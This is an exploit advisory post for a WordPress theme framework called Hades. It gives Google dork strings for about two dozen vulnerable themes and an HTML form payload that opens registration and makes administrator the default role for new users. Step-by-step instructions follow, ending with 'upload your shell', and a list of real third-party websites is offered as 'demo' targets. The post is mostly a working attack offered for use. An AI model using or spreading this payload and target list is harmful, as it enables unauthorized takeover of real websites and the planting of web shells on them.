facebook facebook twitter rss

WordPress 0day - Hades Plus Framework Add Administrator

Author: Hamza HD , Published: 25-11-2014
Exploit Title : WordPress 0day - Hades Plus Framework Add Administrator

Exploit Author : Hamza HD

Date : 20/11/2014

Version: 6.2

Tested on : Linux, Windows 7

--------------------------------------------------------------

WordPress Hades framework suffers from Unauthenticated Configuration Access.

the vulnerability allow the attacker to change the default user type to administrator,
then allows anyone to register. This allows the attacker to register and become
an administrator.

There's Many WordPress Themes/Plugins Vulnerable...

inurl:/wp-content/themes/appius/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/
inurl:/wp-content/themes/GantiDengantema/
inurl:/wp-content/themes/kmp/
inurl:/wp-content/themes/kmp2/
inurl:/wp-content/themes/themanya/
inurl:/wp-content/themes/liberal/
inurl:/wp-content/themes/liberal-media-bias/
inurl:/wp-content/themes/linguini/
inurl:/wp-content/themes/livewire/
inurl:/wp-content/themes/majestics/
inurl:/wp-content/themes/mathis/
inurl:/wp-content/themes/mazine/
inurl:/wp-content/themes/Orchestra/
inurl:/wp-content/themes/shopsum/
inurl:/wp-content/themes/shotzz/
inurl:/wp-content/themes/test/
inurl:/wp-content/themes/Viteeo/
inurl:/wp-content/themes/vithy/
inurl:/wp-content/themes/yvora/
inurl:/wp-content/themes/sodales

Exploit :

<form action="http://127.0.0.1/wp-content/themes/{%THEME%}/hades_framework/option_panel/ajax.php" method="POST">
<input name="values[0][name]" value="users_can_register">
<input name="values[0][value]" value="1">
<input name="values[1][name]" value="admin_email">
<input name="values[1][value]" value="{%YOUR_EMAIL}">
<input name="values[2][name]" value="default_role">
<input name="values[2][value]" value="administrator">
<input name="action" value="save">
<input type="submit" value="Submit">
</form>

1. Change {%THEME%} with the vulnerable theme, {%YOUR_EMAIL} with your email address.
2. go to http://127.0.0.1/wp-login.php?action=register, you will see the registration form.
3. choose your username & email address and register.
4. go to your email, you will find your password.
5. then login & and upload your shell

Demo Sites :

http://calibersport.com/wp-content/themes/echea/hades_framework/option_panel/ajax.php

http://jpjeunet.fr/wp-content/themes/echea/hades_framework/option_panel/ajax.php

http://www.seobelix.com/wp-content/themes/averin/hades_framework/option_panel/ajax.php

http://www.thelinkgroup.ca/wp-content/themes/dagda/hades_framework/option_panel/ajax.php

./peace

My Account Facebook : https://www.facebook.com/Hamza.Gov.Ma

Like us on Facebook :